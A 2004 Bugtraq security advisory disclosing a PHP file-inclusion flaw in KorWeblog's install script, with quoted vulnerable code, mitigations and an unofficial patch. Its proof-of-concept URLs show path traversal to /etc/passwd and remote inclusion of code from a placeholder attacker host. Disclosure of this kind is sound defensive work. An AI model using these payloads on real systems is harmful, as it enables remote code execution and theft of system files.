[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20041230215317.4475.qmail@www.securityfocus.com>
Date: 30 Dec 2004 21:53:17 -0000
From: Min-sung Choi <mins@....or.kr>
To: bugtraq@...urityfocus.com
Subject: KorWeblog php injection Vulnerability
KorWeblog php injection Vulnerability
Release Date : 2004/12/31 (KST)
Author : Mins (mins at fsu.or.kr)
Product : KorWeblog http://weblog.kldp.org
Vendor-Status: Vendor was contacted but I could not receive reply message.
Vendor-Patches: None
Impact: Attacker can execute arbitrary php code.
Summary
=======
KorWeblog is one of popular blog system in Korea.
The "lng" parameter in "/install/index.php" isn't properly verified, before it is used to include files.
And Attacker does not need "register_globals=On".
So this vulnerability would allow remote user to inject php codes.
Affected Products
=================
korweblog 1.6.2-cvs and prior
- 1st case
php.ini : magic_quotes_gpc = Off
- 2nd case
php.ini : magic_quotes_gpc = On
- 3rd case
php.ini : allow_url_fopen : On
Vendor Status : NOT FIXED
=============
2004-12-23 Vulnerability found
2004-12-26 Notified vendor.
2004-12-27 Could not receive reply message.
2004-12-27 Mins made temporary patch.
2004-12-29 2nd vendor Contact.
2004-12-30 Release of unoffical patch.
2004-12-31 Offical advisory release.
Details
=======
If "/install/index.php" exists, attacker can execute arbitrary php code.
Part of weak source (/install/index.php)
----
ini_set('magic_quotes_gpc',1);
ini_set('magic_quotes_sybase',0);
include("../include/misc.inc.php");
include("../include/sql.inc.php");
include("include/check.inc.php");
if(!ini_get("register_globals")) {
include("include/grab_globals.inc.php");
}
$url = eregi_replace("(/install/|/install)$","",F_GetBaseURL());
$path = eregi_replace("(/install/|/install)$","",dirname($_SERVER['SCRIPT_FILENAME']));
$G_VER = "1.6.2";
if (!empty($lng)) include("lang/$lng" . ".php");
Keep in mind that the setting magic_quotes_gpc will not work at runtime.
When the "magic_quotes_gpc" is 'Off', attacker can add '%00' to '$lng'.
However if "magic_quotes_gpc" is 'On', attacker can open only '.php' file.
That's right. But attacker is able to use another file.
Part of another same package source (/include/main.inc.php)
----
if (eregi("main.inc.php", $_SERVER['PHP_SELF']))
die ("You can not access this file directly...");
set_magic_quotes_runtime(0);
ini_set('magic_quotes_gpc',1);
ini_set('magic_quotes_sybase',0);
include("$G_PATH/include/sql.inc.php");
include("$G_PATH/include/layout.inc.php");
include("$G_PATH/include/parser.inc.php");
Proof of Concepts
=================
- 1st case
php.ini : register_globals = On, magic_quotes_gpc = Off
http://[victim]/weblog/install/index.php?lng=../../../../../../etc/passwd%00
- 2nd case
php.ini : register_globals = On
http://[victim]/weblog/install/index.php?lng=../../phpinfo
- 3rd case
php.ini : register_globals = On, allow_url_fopen : On
http://[victim]/weblog/install/index.php?lng=../../include/main.inc&G_PATH=http://[hacker]
Solution
========
- remove the install file
- Set "allow_url_fopen" to "Off".
- unoffical patch
mins@...kme:~/public_html/korweblog-1.6.1/install$ cat index.diff
--- index_1_6_1.php Mon Dec 27 17:31:50 2004
+++ index.php Mon Dec 27 17:40:51 2004
@@ -18,7 +18,10 @@
$G_VER = "1.6.1";
-if (!empty($lng)) include("lang/$lng" . ".php");
+if (!empty($lng)) {
+ if (eregi("\.\.",$lng) || eregi("/",$lng)) $lng="korean";
+ include("lang/$lng" . ".php");
+}
$sql_form ="<P>
<TABLE><TR><TD COLSPAN=2><B>". _SQL_INPUT ."</B></TD>
Credits
=======
Mins at FSU (mins at fsu.or.kr)
Powered by blists - more mailing lists